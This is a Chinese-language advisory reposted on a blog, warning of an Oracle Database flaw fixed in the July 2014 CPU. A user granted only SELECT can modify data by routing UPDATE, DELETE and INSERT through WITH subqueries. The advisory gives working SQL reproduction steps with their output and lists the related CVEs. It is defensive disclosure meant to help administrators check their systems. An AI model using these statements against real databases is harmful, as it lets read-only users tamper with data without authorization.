Oracle資料庫高危漏洞警告!
注:本文來自雲和恩墨。
各位使用者,最近在網際網路上暴露出一個Oracle的高危漏洞,利用該漏洞,僅有查詢許可權的使用者可以對資料進行增、刪、改操作,非常危險。該漏洞影響範圍非常廣泛,包括在國內最常見的11.2.0.3,11.2.0.4,12.1等版本。
該漏洞在2014年7月的CPU中被修正,但是如果使用者未應用該CPU,則漏洞仍然存在。強烈建議您檢查所有Oracle資料庫,確認是否存在該安全風險。
雲和恩墨在自己的測試環境中重現了該漏洞,雲和恩墨的測試環境包括11.2.0.3,11.2.0.4,12.1.0.1這5個版本。您也可以透過以下步驟,檢查資料庫是否存在該漏洞。
(注:以下步驟僅供參考,原則上不會對資料庫有任何影響,但是對於在生產環境中執行以下SQL可能產生的風險雲和恩墨不負有任何責任)
1.首先建立基本測試使用者,僅僅授予建立會話許可權
SQL> create user test_update identified by test_update;
User created.
SQL> grant create session to test_update;
Grant succeeded.
2.將表查詢許可權賦予使用者,注意很多產品環境中都存在類似設定
SQL> grant select on t to test_update;
Grant succeeded.
SQL> select count(*) from t;
COUNT(*)
----------
100
3.使用測試使用者連線,驗證普通的增、刪、改許可權被拒絕
SQL> conn test_update/test_update
Connected.
SQL> select * from enmo.t where rownum = 1;
ID
----------
1
SQL> update enmo.t set id = 1 where id = 1;
update enmo.t set id = 1 where id = 1
*
ERROR at line 1:
ORA-01031: insufficient privileges
4.在WITH語句中,許可權限制被完全繞過,增刪改許可權被獲得
SQL> update (with tmp as (select id from enmo.t) select id from tmp) set id = 0 where id = 1;
1 row updated.
SQL> commit;
Commit complete.
SQL> delete (with temp as (select * from enmo.t) select id from temp) where id = 2;
1 row deleted.
SQL> insert into (with temp as (select * from enmo.t) select * from temp) select 2 from enmo.t where id =3;
1 row created.
5.在Oracle的CPU中,2014年7月的CPU中修改了該問題
由於很多使用者不清楚CPU內容,並未應用,所以產生高危的影響。以下是應用該CPU之後,應有的許可權反應。
SQL> update (with tmp as (select id from enmo.t) select id from tmp) set id = 1 where id = 1;
update (with tmp as (select id from enmo.t) select id from tmp) set id = 1 where id = 1
*
ERROR at line 1:
ORA-01031: insufficient privileges
警告:由於很多使用者對CPU安全補丁關注不足,所以系統中可能存在此高危風險,建議使用者關注該漏洞,並及時採取相應舉措。與此有關的CVE號包括:CVE-2013-3751、CVE-2014-4236、CVE-2014-4237、CVE-2014-4245、CVE-2013-3774 .
相關資訊還可以參考Oracle的CPU頁面:
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/12798004/viewspace-1651827/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- oracle資料庫高危漏洞補丁集安裝Oracle資料庫
- 【漏洞預警】Redis 頻發高危漏洞Redis
- 【技術乾貨】Oracle資料庫漏洞掃描指南Oracle資料庫
- Oracle資料庫訪問限制繞過漏洞 解決Oracle資料庫
- Oracle資料庫——資料匯出時出現匯出成功終止, 但出現警告。Oracle資料庫
- ORACLE 資料庫伺服器業務高峰期高危動作之IOSCAN(HPUNIX)Oracle資料庫伺服器iOS
- 高危預警:針對MySQL資料庫的勒索病毒MySql資料庫
- Java 7.x爆高危漏洞Java
- DedeCms錯誤警告:連線資料庫失敗資料庫
- Oracle 11gR2高危許可權安全漏洞解決Oracle
- ORACLE資料庫安全漏洞之監聽密碼設定Oracle資料庫密碼
- Spring爆出“核彈”級高危漏洞Spring
- 資料庫漏洞解決辦法資料庫
- 資料庫安全漏洞淺析資料庫
- 資料庫安全-ElasticSearch漏洞復現資料庫Elasticsearch
- 製作資料庫映象監視器的警告資訊資料庫
- Oracle 資料庫Oracle資料庫
- 微軟Exchange高危漏洞曝光,請及時更新!微軟
- 設定資料庫映象監視器的警告閾值資料庫
- 織夢DedeCms錯誤警告,連線資料庫失敗資料庫
- 資料庫-oracle-資料庫遷移資料庫Oracle
- 教你資料庫漏洞防護技術資料庫
- oracle資料庫卡頓Oracle資料庫
- oracle資料庫SCNOracle資料庫
- Oracle資料庫效能Oracle資料庫
- 理解ORACLE資料庫Oracle資料庫
- Oracle資料庫管理Oracle資料庫
- Oracle資料庫配置Oracle資料庫
- Oracle資料庫-----資料庫的基本概念Oracle資料庫
- oracle 備份資料庫,匯出資料庫Oracle資料庫
- 將pentaho資料庫遷移到oracle資料庫資料庫Oracle
- 「Oracle」Oracle 資料庫安裝Oracle資料庫
- DataX將MySql資料庫資料同步到Oracle資料庫MySql資料庫Oracle
- 【漏洞】OA辦公系統“烽火狼煙”,高危漏洞攻擊爆發
- 企業需提防九大資料庫漏洞大資料資料庫
- oracle之 oracle database vault(資料庫保險庫)OracleDatabase資料庫
- Error infos: DedeCms錯誤警告:連線資料庫失敗,可能資料庫密碼不對或資料庫伺服器出錯!Error資料庫密碼伺服器
- Error infos:DedeCms錯誤警告:連線資料庫失敗,可能資料庫密碼不對或資料庫伺服器出錯!Error資料庫密碼伺服器